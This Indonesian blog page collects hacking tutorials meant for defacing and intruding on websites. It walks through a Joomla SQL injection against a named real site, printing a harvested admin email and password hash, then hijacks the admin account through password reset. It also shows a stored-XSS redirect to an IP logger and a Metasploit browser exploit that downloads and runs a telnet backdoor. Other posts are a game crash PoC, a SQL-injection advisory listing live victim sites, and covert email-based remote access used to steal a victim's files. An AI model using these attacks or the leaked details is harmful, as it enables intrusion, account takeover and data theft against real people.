Hi, guest | Welcome to Blog Serba Guna | Register | Sign in
Advertise | Contact | About | Live Music | Donation | Sitemap

Kamis, 29 Maret 2012

Teknik Remote by email

. Kamis, 29 Maret 2012


Assalamualaikum saya kali ini mau share tentang exploit joomla com_artforms karna saya suka dengan exploit ini jangan takut karna exploit ini masih bisa di gunakan sampai sekarang :) toturial ini sangat simple dan totur ini sering saya pakai untuk deface website dengan exploit yang 1 ini
ok tanpa basa basi aja ya :) sekarang buka google dan ketik dork di atas
Dork : inurl:”option com_artforms” bisa juga menggunakan dengan mirc :D bagi yang tau ya saya di sini suka manual karna saya jarang main mirc :D
Ok sekarang kita dapat target contoh target di sini saya mendapat kan ini http://www.avaclean.com/
target : http://www.avaclean.com/
dan sekarang kita buka web target tadi
Contoh : http://www.avaclean.com/ dan sekarang coba pasang exploit no 2 tadi dengan contoh seperti ini :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users–
dan hasil nya akan seperti ini
josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P
dan sekarang kita coba open tab untuk mereset password nya
contoh :
http://www.avaclean.com//index.php?option=com_user&view=reset
dan sekarang masukan email tersebut
josh@bkmediagroup.com
ok nanti dia akan meminta token uppzzz jangan senang dulu sekarang kita coba cari token dengan memakai exploit no 4
contoh :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users–
dan hasil nya akan menjadi seperti ini
admineda7d6142fac40a533b56407a4617371
ok sekarang kita kembali ke reset password tadi kan tadi minta token sekarang kita liat code yang barusan tadi
ok kita dapat seperti ini : admineda7d6142fac40a533b56407a4617371   <== yang mana code token nya ?? ok sekarang saya jelas kan
code : [admin]eda7d6142fac40a533b56407a4617371
yang saya kasih dalam tanda kurung itu adalah user nya
nah sekarang coba kita ambil code ini : eda7d6142fac40a533b56407a4617371
dan itu adalah token nya :) ok binggo sekarang user sudah ke reset tinggal masukan password baru aja :D
selamat sekarang anda menjadi admin
untuk joomla login ada biasa nya
contoh login admin : http://localhost/administrator
dan sekarang coba kita masukan dengan user yang tadi kalian dapat dan password baru yang kalian buat tadi :)
# Update
untuk code token sekarang kalau untuk manual kebanyakan biasa nya memakai tanda $$$ contoh token yang tidak bisa di reset seperti ini
:admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$
dan bila kalian menemukan bagian seperti ada tanda $1$c8b6c03c$ tidak bisa di reset password
Ok sekian dulu toturial dari saya salam selalu .
Mohon maaf bila ada salah yang saya berikan ini :) assalamualaikum :)
Thanks to : p4km1n -=- SikodoQ -=- Unix -=- Billgates -=- Raka MBT -=- Om-Jin -=- All member KCH | MBT | Anonymousteam Defacer Indonesia |

Memanfaatkan celah XSS Persistent pada suatu web untuk menyebarkan backdoor telnet ke para pengunjung web

Sebelum membaca tutorial bagi yang belum mengetahui XSS Persistent maka disarankan anda masuk ke http://blog.xcode.or.id/?p=983 untuk lebih memahami XSS Persistent.
Pertama-tama anda dapat membuat sebuah file dengan nama web.php
web.ph<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<head>
<title>Error page</title>
</HEAD>
<BODY>
<?php
$ipaddress = $_SERVER['REMOTE_ADDR'];
$referrer = getenv(‘HTTP_REFERER’);
$simpandate = date(“d-m-y / H:i:s”);
$userAgent = getenv(‘HTTP_USER_AGENT’);
$invoegen = $simpandate . ”
<br/><b>IP :</b> ” . $ipaddress . ”
<br/> <b>From :</b> <a href=’” . $referrer . “‘>” . $referrer . “</a>
<br/><b>Browser :</b> ” . $userAgent .”
<br />========================================<br/>”;
$fopen = fopen(“daftar_ip.html”, “a”);
fwrite($fopen, $invoegen);
fclose($fopen);
?>
<script type=’text/javascript’>
window.location.href=”http://(ip komputer anda)/”;
</script>
</BODY>
</HTML>
Lalu buat file kosong dengan nama daftar_ip.html.
Kita siapkan Metasploit Framework, disini ada berbagai exploitasi browser dan aplikasi-aplikasi yang dapat berintegrasi dengan browser misal Adobe Acrobat.
Disini penulis contohkan untuk IE 7.
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 718 exploits – 361 auxiliary – 68 post
+ — –=[ 226 payloads – 27 encoders – 8 nops
=[ svn r13462 updated 229 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 229 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use exploit/windows/browser/ms09_002_memory_corruption
msf  exploit(ms09_002_memory_corruption) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf  exploit(ms09_002_memory_corruption) > set SRVPORT 80
msf  exploit(ms09_002_memory_corruption) > set URL http://(domain  anda tempat meletakkan file telnet)/telnet2.exe
SRVPORT => 80
URL => http://(domain  anda tempat meletakkan file telnet)/telnet2.exe
msf  exploit(ms09_002_memory_corruption) > set URIPATH /
URIPATH => /
msf  exploit(ms09_002_memory_corruption) > exploit
Setelah memasukkan perintah-perintah diatas maka komputer anda sudah siap untuk menerima kunjungan dari browser korban.
Karena kita menggunakan backdoor telnet maka target juga harus memiliki IP Publik dan berhubungan langsung dengan komputernya misalnya dia menggunakan Indos*t M2, atau Telk*m Fl*sh. Jika target anda tidak mempunyai IP Publik yang berhubungan langsung dengan komputernya maka anda dapat menggunakan backdoor lain yang sifatnya komputer korban memanggil komputer penyerang yang konsepnya sama dengan Connect Back.
Skenario
Pada target yang memilih celah XSS Persistent dapat dimasukkan <script>document.location=’http://(web anda)/web.php’;</script>
Ketika sudah disimpan oleh web dan korban membuka web tersebut maka korban dari website yang dia buka akan menjalankan web.php dan terekam ip komputer korban, dari situ browser akan diarahkan untuk membuka exploit di komputer attacker.  Saat exploit bekerja dengan baik maka korban akan mendownload otomatis file telnet2.exe dan dijalankan.
Saat komputer korban menjalankan file telnet2.exe maka kita dapat melihat daftar IP ( daftar_ip.html ) yang terekam tadi tinggal kita masuk ke komputer korban dengan perintah telnet (ip korban) 5000. Mengapa port 5000? karena file telnet2.exe membuka pada port 5000.
Download : http://xcode.or.id/telnetbackdoor.rar
*Program ini terdeteksi sebagai malware oleh AV
Password : yogyafree
Oleh Kurniawan – yk_family_code@yahoo.com

XSS Persistent untuk deface halaman web

Berjumpa lagi dengan saya Mas Kurniawan.  Sebelumnya penulis telah membahas tentang XSS, untuk review k ebelakang penulis akan membahasnya kembali bahwa XSS adalah salah satu serangan injeksi code (kode html) yang dimana sebelumnya di blog ini yang dibahas adalah yang sifatnya reflected atau non persistent yang disitu kode HTML tidak tersimpan di web server.
Teknik XSS (Cross Site Scripting) untuk mendapatkan shell target si pembuka URL
http://blog.xcode.or.id/?p=634
Juga di http://blog.xcode.or.id/?p=883 dibahas dari scanning XSS dan exploitasinya.
Disini penulis akan membahas tentang XSS stored atau Persistent yang dapat berpengaruh pada semua klien yang masuk ke halaman web tersebut karena inputan HTML kita akan disimpan didalam web server.
Contohnya target kita adalah CMS Max Guestbook, CMS ini tidak ada databasenya, hasil rekaman disimpan di web server.
Disini penulis mencoba melakukan inputan pada “Name”, disini inputannya adalah :
<script>alert('Kurniawan memang ganteng')</script>
Seperti dibawah ini :



















Hasilnya adalah











Ketika pengunjung lain masuk ke buku tamu tersebut maka pesan alert “Kurniawan memang ganteng” tetap muncul karena inputan HTML yang penulis lakukan tersimpan dalam web server.
Sekarang kita coba dengan
<script>document.location=’http://xcode.or.id/sample.html’;</script>













Maka hasilnya buku tamu akan melakukan redirect ke http://xcode.or.id/sample.html
Dengan demikian maka kesimpulannya adalah XSS stored atau Persistent mempunyai efek serangan yang lebih besar dibandingkan dengan XSS sifatnya reflected atau non persistent.
Oleh Kurniawan – yk_family_code@yahoo.com

Counter-Strike 1.6 No Steam Crash Exploit


=========================================
Counter-Strike 1.6 No Steam Crash Exploit
=========================================
:————————————————————————————————————————————————————:
: # Exploit Title : Counter-Strike 1.6 No Steam Crash Exploit
: # Date : March 4th 2012
: # Author : X-Cisadane
: # Software Link : http://blog.counter-strike.net/
: # Version : 1.6
: # Category : Desktop (Windows) Applications
: # Platform : Win32
: # Vulnerability : Crash Exploit
: # Tested On : Windows XP Professional Service Pack 3
: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:————————————————————————————————————————————————————:
Proof Of Concept
================
[ENGLISH]
1.This my default Counter-Strike No Steam installation directory : C:\Program Files\Counter-Strike 1.6\
2.Open default Counter-Strike No Steam installation directory and open the directory named cstrike (C:\Program Files\Counter-Strike 1.6\cstrike\)
3.Find & Open motd.txt and replace the contents with this code :
HTML BODY IFRAME src=”file://þ:/filename” /BODY /HTML
4.Save!
5.Run Counter-Strike 1.6 No Steam
- Create a new game, Choose the map & set the gameplay.
- Start your game! Waiting until map loaded & the motd show
- And Counter-Strike 1.6 No Steam Forcibly Closed (Crash).
[INDONESIAN]
1.Ini direktori saya tempat menginstall Counter-Strike No Steam : C:\Program Files\Counter-Strike 1.6\
2.Buka direktori tempat menginstall Counter-Strike No Steam dan buka direktori bernama cstrike (C:\Program Files\Counter-Strike 1.6\cstrike\)
3.Temukan dan buka file motd.txt dan ganti isi file tersebut dengan koding di bawah ini :
iframe src=”file://þ:/filename” width=”320″ height=”240″ /iframe
4.Simpan!
5.Jalankan Counter-Strike 1.6 No Steam
- Buat sebuah Server, Pilih map dan atur permainan.
- Mulailah permainan! Tunggu hingga progress bar selesai dan map berhasil dimuat serta motdnya muncul.
- Dan secara paksa Counter-Strike 1.6 No Steam akan tertutup.
NB : Exploit ini bisa dikembangkan, monggo bagi yang dah master silahkan dicoba-coba

CnnCMS 1.x SQL Injection Vulnerability

:————————————————————————————————————————-:
: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability
: # Date : March 3rd 2012
: # Author : Darkzzzz a.k.a X-Cisadane
: # Software Link : http://www.thinknolimits.com/
: # Version : 1.x
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:sub_menu.php?sid=
: # Greetz to : XCode-Yogyafree, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:————————————————————————————————————————-:
SQL Injection Vulnerability :
- Open Victim Website : http:////sub_menu.php?sid=-[SQL]
Example :
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1
Admin Page (Default) : http:////admin/

Tutorial penggunaan Remote By Mail

Penulis : j0ck3r » Sun Feb 26, 2012
Remote By Mail buatan http://www.runtime.org/ Meskipun namanya Remote tapi software ini bukanlah Trojan,saya lebih suka menyebutnya sebagai software remote access,akan tetapi tehnik yang digunakan cukup unik yaitu menggunakan media e-mail.,suatu tehnik yang unik dan bisa melewati proteksi yang dilakukan oleh Firewall.Tetapi ( ada tapinya lhoo…) kita tidak bisa melakukan instalasi jarak jauh seperti trojan yang bisa di binded dengan software lain.Kita haru duduk didepan komputer korban dan melakukan installasi manual dan setting manual.Yuk kita mulai belajar menggunakan software ini
Pertama-tama,setelah download filenya kita lakukan installasi dulu,jadi gak perlu saya jelaskan disini,tentunya semuanya bisa melakukan installasi. Downloadnya disini
setelah selesai lalu kita jalankan softwarenya dan pilih tools lalu pilih account,disini kita isi dengan alamat e-mail dimana software ini secara berkala akan melakukan check di inbox e-mail yang udah kita tentukan.urutanya kaya gini:
Account name: Diisi bebas
From Name: Di isi Bebas
From E-mail: Di isi alamat e-mail tempat perintah dikirimkan
POP Server : Alamat POP e-mail tempat perintah,disini saya pake e-mail dari drivehq jadi alamat POP nya adalah mail.drivehq.com
POP User : Di isi username POP
POP Password: Di isi Password login POP
SMTP: : Di isi alamat SMTP E-mail
Authentication : Pilih aja same as POP
Delete Message: Menentukan tiap berapa hari e-mail di software ini dihapus
Kolom Access: Menentukan dari domain e-mail mana perintah yang akan dilakukan. Misal kita pakai gmail maka di isi *@gmail.com
Available Commands: Default perintah yang ada,kita bisa ,menambahkan daftar perintah disana
Password: Menentukan Pasword,karena sekarang memalsukan e-mail kan mudah,maka diperlukan password agar software ini melakukan verifikasi perintah dari “tuannya”
Default Reply Subject: Diisi bebas
kalau udah klik OK. kaya gambar dibawah
Nb: Bila ada yang belum tahu alamat POP dan SMTP e-mail yang digunakan,bisa ditanyakan ke penyedia layanan e-mail yang digunakan.

Lalu setelah selesai klik lagi Tools dan pilih Options dan kita tentukan tiap berapa menit software ini mengecek e-mail di inbox yang sudah di setting tadi

Kalau udah kita klik start dan komputer yang terinstall sudah siap dikendalikan dengan e-mail.Sekarang kita buka e-mail lalu kirimkan perintah ke e-mail yang sudah kita set tadi di softwarenya.Tadi saya menggunakan email dari drivehq yaitu j0ck3rmaniax@drivehq.com sedangkan e-mail untuk memberi perintah adalah jockermaniax@gmail.com,jadi saya buka gmail dan mulai menjalankan perintah darisana.Untuk mode penulisan perintahanya sebagai berikut:
Dibagian penerima pesan saya masukkan email dari drivehq tadi,lalu dibagian subject saya isi passsword yang sudah saya tentukan,misal kita mengisi kolom password tadi dengan123456 maka di bagian subject di isi 123456,dan dibagian Body/Isi surat kita masukkan perintah yang kita kehendaki.Misal saya ingin liat isi drive C: korban,maka dibagian Body saya tulis DIR C: lalu kita kirim

Remote By Mail akan mengecek inbox di e-mail j0ck3rmaniax@drivehq.com,bila ada perintah baru dia akan segera merespon dan membalas perintah tersebut ke e-mail saya tadi yaitu jockermaniax@gmail.com


Thuu..keliatan isi Drive C: nya.Bila kita ingin mengambil file yang ada di komputer korban,maka kita ketikkan perintah SEND ( drive\directory\namafile),misal saya akan mengambil file yang bernama creditcard.txt yang terletak di drive C:\data\ maka saya ketikkan SEND C:\data\creditcard.txt di bagian body e-mail.
Sekian tulisan dari saya,bila ada salah kata mohon maaf sebesar besarnya yaaa… :D

courtesy.xcode
Share this Article now on :
ARTIKEL YANG BERHUBUNGAN :


0 komentar:

:X ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Posting Komentar